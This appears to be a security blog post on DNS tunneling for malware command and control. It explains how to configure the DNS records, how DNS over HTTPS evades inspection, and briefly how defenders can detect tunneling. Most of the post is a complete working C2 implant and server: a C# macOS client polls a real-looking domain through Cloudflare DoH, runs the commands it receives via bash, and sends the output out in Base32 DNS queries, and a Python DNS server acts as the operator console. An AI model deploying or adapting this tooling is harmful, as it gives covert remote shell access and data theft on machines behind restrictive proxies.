DNS Tunneling

The Domain Name System (DNS) is used to resolve hostnames to their associated IP addresses. DNS can be used as a transport mechanism for malware Command & Control (C2) messages. This is useful if an environment has a restrictive web proxy that makes connecting outbound via HTTP difficult.

The concept of DNS tunneling is simple. An attacker configures nameserver records to point to their C2 server. For instance, they could configure an NS record for c2.malware.com, so that any host querying subdomains such as subdomain.c2.malware.com are redirected to this host.

In a corporate environment, typically a client makes a DNS request to an internal DNS server that will in turn query root servers if the system unable to answer the query itself. The DNS client will not directly connect to the attackers server.

Data from the client to the DNS server can be encoded within the A name record. For example, a client could make a request to test1.c2.malware.com, which the server can read to determine the client’s ID is test1. The server can acknowledge this query by encoding data in the IP address returned. For instance, using ASCII encoding, the server could return the letters “wait” by responding with the IP address 119.97.105.116.

To upload larger amounts from the client to the server, data can be Base32 encoded. Base32 is a suitable encoding mechanism since it doesn’t use characters which are restricted in domain names.

DNS tunneling is not restricted to A name records. Other records such as AAAA or TXT can also be used and potentially offer more space for encoded messages therefore increasing traffic throughput.

When a client communicates with a server, each request needs to be unique to prevent intermediary DNS servers from caching the responses.

DNS Record Configuration

The below DNS records are configured using Godaddy’s DNS manager.

TypeNameValueTTL
ANS11.1.1.1900
NSC2ns1.mydomain.com900

Any DNS request for subdomain.c2.mydomain.com will be forwarded to the IP address of our C2 server (1.1.1.1).

DNS Over HTTPS (DoH)

DoH is a way of performing DNS lookups over a HTTPS connection.

Cloudflare provide documentation on how to perform these requests. Using DOH has a couple of benefits from an attackers perspective;

  • Traffic is encrypted by default. Unless HTTPS inspection is being performed, network analytics systems will not be able to interrogate the traffic.
  • The client network will only see connections to the DOH server infrastructure, masking the real destination of the traffic.

DNS Tunneling Detection

There are a number of things defenders can do in relation to DNS tunneling;

  • Sinkhole known malicious DNS domains.
  • Perform DNS frequency analysis. Most SIEM system provide use cases to trigger based on large increases in DNS requests from a host.
  • Most DNS C2 clients rely on Base32 or similar encoding mechanisms. This results in domain lookups that feature long domains with several numbers in them. This is unusual behavior, and again can be alerted on.
  • Block direct outbound DNS connections at a firewall level. DNS traffic should only be allowed to leave the organisation from internal DNS servers.

Creating a Proof of Concept Client

Below is a .NET 6 C# client for macOS. The client uses A name records for encoding data, and performs requests either using DNS or DOH.

A Python DNS server is provided. The server does not directly support DOH, although the DOH service used by the client (in this case Cloudflare) will relay standard DNS requests to it.

C# Client Code

using System.Diagnostics;
using System.Net;
using System.Text;
using DnsClient;
using System.Net.Http.Headers;
using Newtonsoft.Json;
using Newtonsoft.Json.Linq;

public static class c2client
{
    //Config variables
    static String C2Server = ".test.bordergate.co.uk";
    // Client poll time in milliseconds
    static int C2delay = 2000;
    // Placeholder ClientID (will be randomly generated)
    static String ClientID = "XXXXX";
    // Use Cloudflare DNS over HTTPS
    static int UseDOH = 1;

    private static Random random = new Random();
    public static string RandomString(int length)
    {
        const string chars = "ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789";
        return new string(Enumerable.Repeat(chars, length)
          .Select(s => s[random.Next(s.Length)]).ToArray());
    }

    public static string DecodeCommand(string address)
    //Convert IP address returned by server to ASCII
    {
        String result = "error";
        try
        {
            string[] octets = address.Split('.');
            result = "";
            foreach (var octet in octets)
            {
                int unicode = Convert.ToInt32(octet);
                char character = (char)unicode;
                string text = character.ToString();
                result += text;
            }
        }
        catch
        {
            Console.WriteLine("Error splitting string: " + address);
        }

        return result;
    }

    public static string DOHLookup(string domain)
    // Performs lookup using Cloudflare DOH
    {
        String ipv4 = "";
        try
        {
            string apiEndpoint = "https://1.1.1.1/dns-query?name=";
            using (var client = new HttpClient())
            {
                client.DefaultRequestHeaders
                 .Accept
                 .Add(new MediaTypeWithQualityHeaderValue("application/dns-json"));

                var response = client.GetAsync(apiEndpoint + domain).GetAwaiter().GetResult();
                if (response.IsSuccessStatusCode)
                {
                    var responseContent = response.Content;
                    string results = responseContent.ReadAsStringAsync().GetAwaiter().GetResult();
                    Console.WriteLine(results);
                    dynamic dynObj = JsonConvert.DeserializeObject(results);
                    foreach (var answer in dynObj.Answer)
                    {
                        ipv4 = answer.data;
                    }
                }
            }
        }
        catch
        {
            Console.WriteLine("DOH lookup failed");
        }
        return ipv4;
    }

    public static string IPLookup(String domain)
    //Resolve a domain to IP address
    {
        string ip = "";

        if (UseDOH == 1)
        {
            ip = DOHLookup(domain);
        }
        else {
            var client = new LookupClient(

            new LookupClientOptions(NameServer.GooglePublicDns)
            {
                UseCache = false,
                EnableAuditTrail = false,
                Retries = 10,
                Timeout = TimeSpan.FromSeconds(20),
                ThrowDnsErrors = false
            });

        foreach (var aRecord in client.Query(domain, QueryType.A).Answers.ARecords())
            {
                ip = aRecord.Address.ToString();
            }
        }
        return ip;
    }

    public static void GetCommands()
    // make a DNS request with a 5 character client ID, and 5 character random value (to prevent caching issues)
    {
        String ClientID = RandomString(5).ToString();
        String CommandBuffer = "";

        while (true)
        {
            String request = ClientID + RandomString(5).ToString() + C2Server;
            String address = IPLookup(request);
            if (address == "")
            {
                Console.WriteLine("DNS Lookup failed: " + request);
                Console.WriteLine("Sleeping 10 seconds...");
                System.Threading.Thread.Sleep(10000);

            }
            else
            {
                String command = DecodeCommand(address.ToString());
                Console.WriteLine(DateTime.Now.ToString("THH:mm:ss") + " Server:" + command);

                if (command == "wait")
                {
                    // do nothing
                }
                else if (command == "::::")
                {
                    // :::: signifys command should be executed
                    Console.WriteLine(DateTime.Now.ToString("THH: mm:ss") + " Running command: '" + CommandBuffer + "'");
                    UploadResults(ExecCommand(CommandBuffer.Trim()));
                    CommandBuffer = "";
                }
                else
                {
                    CommandBuffer += command;
                }
            }

            System.Threading.Thread.Sleep(C2delay);
        }
    }

    public static string ExecCommand(String command)
    // Execute a command
    {
        try
        {
            Process p = new Process();
            p.StartInfo.UseShellExecute = false;
            p.StartInfo.RedirectStandardOutput = true;
            p.StartInfo.FileName = "bash";
            p.StartInfo.Arguments = " -c \"" + command + "\"";
            p.Start();
            string output = p.StandardOutput.ReadToEnd();
            p.WaitForExit();
            Console.Write(output);
            return output;
        }
        catch {
            Console.WriteLine("Error running command");
            return "Error running command: '" + command + "'";
        }
    }

    public static string UploadResults(String results)
    // Send results back to the server by encoding data in 30 byte A name lookups.
    {
        IEnumerable<string> chunks = results.Split(30);

        foreach (string chunk in chunks)
        {
            if (chunk.Length != 30)
            {
                Console.WriteLine("Padding small chunk: " + chunk.Length);
                String paddedchunk = chunk.PadRight(30, '^');

                String Base32Encoded = DNSC2.Base32Encoding.ToString(Encoding.ASCII.GetBytes(paddedchunk));
                Console.WriteLine(Base32Encoded);
                IPLookup(ClientID + Base32Encoded + C2Server);
            }
            else
            {
                String Base32Encoded = DNSC2.Base32Encoding.ToString(Encoding.ASCII.GetBytes(chunk));
                Console.WriteLine(Base32Encoded);
                IPLookup(ClientID + Base32Encoded + C2Server);
            }

        }
            return "";
    }

    public static void Main()
    {
        GetCommands();
    }
}


public static class Extensions
{
    public static IEnumerable<string> Split(this string str, int n)
    {
        if (String.IsNullOrEmpty(str) || n < 1)
        {
            //throw new ArgumentException();
        }

        for (int i = 0; i < str.Length; i += n)
        {
            yield return str.Substring(i, Math.Min(n, str.Length - i));
        }
    }
}

Client Base32 Encoding Library

using System;

namespace DNSC2
{
	public static class Base32Encoding
	{
        public static byte[] ToBytes(string input)
        {
            if (string.IsNullOrEmpty(input))
            {
                throw new ArgumentNullException("input");
            }

            input = input.TrimEnd('='); //remove padding characters
            int byteCount = input.Length * 5 / 8; //this must be TRUNCATED
            byte[] returnArray = new byte[byteCount];

            byte curByte = 0, bitsRemaining = 8;
            int mask = 0, arrayIndex = 0;

            foreach (char c in input)
            {
                int cValue = CharToValue(c);

                if (bitsRemaining > 5)
                {
                    mask = cValue << (bitsRemaining - 5);
                    curByte = (byte)(curByte | mask);
                    bitsRemaining -= 5;
                }
                else
                {
                    mask = cValue >> (5 - bitsRemaining);
                    curByte = (byte)(curByte | mask);
                    returnArray[arrayIndex++] = curByte;
                    curByte = (byte)(cValue << (3 + bitsRemaining));
                    bitsRemaining += 3;
                }
            }

            //if we didn't end with a full byte
            if (arrayIndex != byteCount)
            {
                returnArray[arrayIndex] = curByte;
            }

            return returnArray;
        }

        public static string ToString(byte[] input)
        {
            if (input == null || input.Length == 0)
            {
                throw new ArgumentNullException("input");
            }

            int charCount = (int)Math.Ceiling(input.Length / 5d) * 8;
            char[] returnArray = new char[charCount];

            byte nextChar = 0, bitsRemaining = 5;
            int arrayIndex = 0;

            foreach (byte b in input)
            {
                nextChar = (byte)(nextChar | (b >> (8 - bitsRemaining)));
                returnArray[arrayIndex++] = ValueToChar(nextChar);

                if (bitsRemaining < 4)
                {
                    nextChar = (byte)((b >> (3 - bitsRemaining)) & 31);
                    returnArray[arrayIndex++] = ValueToChar(nextChar);
                    bitsRemaining += 5;
                }

                bitsRemaining -= 3;
                nextChar = (byte)((b << bitsRemaining) & 31);
            }

            //if we didn't end with a full char
            if (arrayIndex != charCount)
            {
                returnArray[arrayIndex++] = ValueToChar(nextChar);
                while (arrayIndex != charCount) returnArray[arrayIndex++] = '='; //padding
            }

            return new string(returnArray);
        }

        private static int CharToValue(char c)
        {
            int value = (int)c;

            //65-90 == uppercase letters
            if (value < 91 && value > 64)
            {
                return value - 65;
            }
            //50-55 == numbers 2-7
            if (value < 56 && value > 49)
            {
                return value - 24;
            }
            //97-122 == lowercase letters
            if (value < 123 && value > 96)
            {
                return value - 97;
            }

            throw new ArgumentException("Character is not a Base32 character.", "c");
        }

        private static char ValueToChar(byte b)
        {
            if (b < 26)
            {
                return (char)(b + 65);
            }

            if (b < 32)
            {
                return (char)(b + 24);
            }

            throw new ArgumentException("Byte is not a value Base32 value.", "b");
        }
    }
}

Python Server Code

#!/usr/bin/env python

import argparse
import datetime
import sys
import time
import threading
import traceback
import socketserver
import struct
from dnslib import *
import logging

clientdict = {}
commandlist = []
clientid = ''
activeclient = ""

class DomainName(str):
    def __getattr__(self, item):
        return DomainName(item + '.' + self)

D = DomainName('')
IP = '1.1.1.1'
TTL = 1 * 5

soa_record = SOA(
    mname=D.ns1,      # primary name server
    rname=D.test,     # email of the domain administrator
    times=(
        201307231,    # serial number
        60 * 60 * 1,  # refresh
        60 * 60 * 3,  # retry
        60 * 60 * 24, # expire
        60 * 60 * 1,  # minimum
    )
)
ns_records = [NS(D.ns1), NS(D.ns2)]
records = {}

def encodecommand(raw_command):
#Take a part of a command and encode it in an IP address
    responsearray = ['032','032','032','032']
    i = 0
    for letter in raw_command:
        responsearray[i] = ord(letter)
        i += 1
    result = ""
    for octet in responsearray:
        result += str(octet) + "."
    return result[:-1]

def c2logic(qn):
#Check the domain requested. Supply commands back to client.
    global commandlist
    global clientid
    global clientdict
    global activeclient
    requestarray = qn.split(".")
    clientid = requestarray[0]
    clientid = clientid[:5]
   
    if clientid not in clientdict:
        print("new connection from: " + clientid)
        dt = datetime.datetime.now()
        clientdict[clientid] = str(dt)

    if (len(clientid) == 5) and (clientid == activeclient):
        if len(commandlist) != 0:
            logging.info("SERVER RESPONSE")
            logging.info(commandlist)
            logging.info(commandlist[0])
            response = commandlist[0]
            del commandlist[0]
        else:
            response = encodecommand("wait")
    else:
        logging.info("WAITING")
        response = encodecommand("wait")
        return response
    return response

def dns_response(data):
    request = DNSRecord.parse(data)
    reply = DNSRecord(DNSHeader(id=request.header.id, qr=1, aa=1, ra=1), q=request.q)

    qname = request.q.qname
    qn = str(qname)
    qtype = request.q.qtype
    qt = QTYPE[qtype]
    D = qn
    logging.info("CLIENT REQUEST: " + qn)
    command = qn.split('.')[0]
    # If the request is 10 characters long, it's a beacon id requesting a command
    if len(command) == 10:
        IP = c2logic(qn)
        if IP == '58.58.58.58':
            commandlist.clear()
        records = { D: [A(IP), AAAA((0,) * 16), soa_record]}

        for name, rrs in records.items():
            if name == qn:
                for rdata in rrs:
                    rqt = rdata.__class__.__name__
                    if qt in ['*', rqt]:
                        reply.add_answer(RR(rname=qname, rtype=getattr(QTYPE, rqt), rclass=1, ttl=TTL, rdata=rdata))
        for rdata in ns_records:
            reply.add_ar(RR(rname=D, rtype=QTYPE.NS, rclass=1, ttl=TTL, rdata=rdata))
        reply.add_auth(RR(rname=D, rtype=QTYPE.SOA, rclass=1, ttl=TTL, rdata=soa_record))
    else:
        # If not a command, it's a response from the client
        logging.info("CLIENT RESPONSE " + command)
        command = command[5:]
        logging.info("COMMAND " + command)
        decoded = base64.b32decode(bytearray(command, 'ascii')).decode('utf-8')
        logging.info(decoded)
        #print(str(decoded),end = '')
        print(str(decoded).replace('^',''), end = '')
        IP = "9.9.9.9"
        records = { D: [A(IP), AAAA((0,) * 16), soa_record]}

        for name, rrs in records.items():
            if name == qn:
                for rdata in rrs:
                    rqt = rdata.__class__.__name__
                    if qt in ['*', rqt]:
                        reply.add_answer(RR(rname=qname, rtype=getattr(QTYPE, rqt), rclass=1, ttl=TTL, rdata=rdata))
        for rdata in ns_records:
            reply.add_ar(RR(rname=D, rtype=QTYPE.NS, rclass=1, ttl=TTL, rdata=rdata))
        reply.add_auth(RR(rname=D, rtype=QTYPE.SOA, rclass=1, ttl=TTL, rdata=soa_record))


    #print("---- Reply:\n", reply)
    return reply.pack()


class BaseRequestHandler(socketserver.BaseRequestHandler):

    def get_data(self):
        raise NotImplementedError

    def send_data(self, data):
        raise NotImplementedError

    def handle(self):
        now = datetime.datetime.utcnow().strftime('%Y-%m-%d %H:%M:%S.%f')
        try:
            data = self.get_data()
            self.send_data(dns_response(data))
        except Exception:
            pass


class TCPRequestHandler(BaseRequestHandler):

    def get_data(self):
        data = self.request.recv(8192).strip()
        sz = struct.unpack('>H', data[:2])[0]
        if sz < len(data) - 2:
            raise Exception("Wrong size of TCP packet")
        elif sz > len(data) - 2:
            raise Exception("Too big TCP packet")
        return data[2:]

    def send_data(self, data):
        sz = struct.pack('>H', len(data))
        return self.request.sendall(sz + data)


class UDPRequestHandler(BaseRequestHandler):

    def get_data(self):
        return self.request[0].strip()

    def send_data(self, data):
        return self.request[1].sendto(data, self.client_address)


def main():
    global activeclient
    parser = argparse.ArgumentParser(description='Start a DNS implemented in Python.')
    parser = argparse.ArgumentParser(description='Start a DNS implemented in Python. Usually DNSs use UDP on port 53.')
    parser.add_argument('--port', default=53, type=int, help='The port to listen on.')
    parser.add_argument('--tcp', action='store_true', help='Listen to TCP connections.')
    parser.add_argument('--udp', action='store_true', help='Listen to UDP datagrams.')
    parser.add_argument('-d', action='store_true', help='Debug mode')
    
    args = parser.parse_args()

    print("Starting nameserver...")
    args.udp = True
    servers = []
    if args.udp: servers.append(socketserver.ThreadingUDPServer(('', args.port), UDPRequestHandler))
    if args.tcp: servers.append(socketserver.ThreadingTCPServer(('', args.port), TCPRequestHandler))

    if args.d: logging.basicConfig(level=logging.INFO, format='%(asctime)s :: %(levelname)s :: %(message)s')

    for s in servers:
        thread = threading.Thread(target=s.serve_forever) 
        thread.daemon = True
        thread.start()
        print("%s server loop running in thread: %s" % (s.RequestHandlerClass.__name__[:3], thread.name))

    try:
        while 1:

            #Take user input. Divide into 4 char chunks and encode. End with '::::'.
            usercommand = input("\n" + clientid + ">")
            if usercommand == "clients":
                print(clientdict)
                pass
            elif usercommand.startswith("active"):
                activeclient = usercommand.split(" ")[1]
                print("active client: " + activeclient)
                pass
            else:
                csize = 4
                chunks = [usercommand[i:i+csize] for i in range(0, len(usercommand), csize)]
                for chunk in chunks:
                    commandlist.append(encodecommand(chunk))
                commandlist.append('58.58.58.58')
                sys.stderr.flush()
                sys.stdout.flush()

    except KeyboardInterrupt:
        pass
    finally:
        for s in servers:
            s.shutdown()

if __name__ == '__main__':
    main()